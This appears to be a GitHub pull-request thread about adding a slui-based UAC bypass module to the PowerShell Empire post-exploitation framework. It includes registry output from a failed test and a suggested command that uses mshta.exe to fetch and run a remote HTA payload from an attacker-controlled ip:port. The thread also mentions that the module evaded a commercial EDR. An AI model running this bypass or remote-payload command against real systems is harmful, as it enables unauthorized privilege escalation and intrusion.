Windows Local Privilege Escalation Module - SLUI BypassUAC

[Truneski]

This is a simple privilege escalation module that was already written in PowerShell by gushmazuko:https://github.com/gushmazuko/WinBypass
It works by simply taking a one liner (can be any) to execute our powershell empire payload and we get a high privilege Empire shell.
Hopefully this helps someone out there like it did from my engagement today.
If you have any questions feel free to ping me on twitter/slack and also feel free to improve in any way shape or form.

[ThePirateWhoSmellsOfSunflowers]

Hi,

Unfortunately, your module fails on my lab.

On my W10 test machine:

On Empire side:

(Empire: powershell/privesc/bypassuac_slui) > Job started: G2XR3U


Property      : {}
PSPath        : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command
PSParentPath  : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName   : command
PSDrive       : HKCU
PSProvider    : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount   : 
View          : Default
Handle        : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount    : 
Name          : HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\command

DelegateExecute : 
PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open\comman
                  d
PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\exefile\shell\open
PSChildName     : command
PSDrive         : HKCU
PSProvider      : Microsoft.PowerShell.Core\Registry

Am I missing something ?

🌻

[Truneski]

Hmm, honestly I'm not sure.
What I did what set the command to execute a hta file i.e
set command "c:\windows\system32\mshta.exe http://ip:port/windows.hta"

So keep testing out new things.

[ThePirateWhoSmellsOfSunflowers]

On another test VM:

However if I use the ps1 alone, it works.

🌻

[ThePirateWhoSmellsOfSunflowers]

Weeeelllllll, I think I misunderstood. From the beginning I tried to use your module like a normal empire bypass UAC module : launch it and wait for the new agent to pop. But in fact your module take a command parameter, mandatory but it is pre-filled with Default (?) hence the random error on my W10 machine.

I think you should rewrite your module in order to keep bypass UAC module architecture consistent. A privesc module (like a UAC bypass one) have to launch a second agent (elevated one). It must be easy to implement (see others UAC bypass modules)

🌻

[Truneski]

It's the main hurdle I came across..adding a launcher to automatically execute. However, I urge you or anyone else for that(preferably more skilled than me) to look at the code and make improvements.
I used the module to great effect on an engagement against a top tier EDR. '
Just wanted to submit it here and hopefully see if it can help anyone. That to me will be enough.

[ThePirateWhoSmellsOfSunflowers]

I'll give a try to implement the correct method, I'll submit a new PR based on this one.

🌻

[Truneski]

Awesome dude, I'd appreciate the help.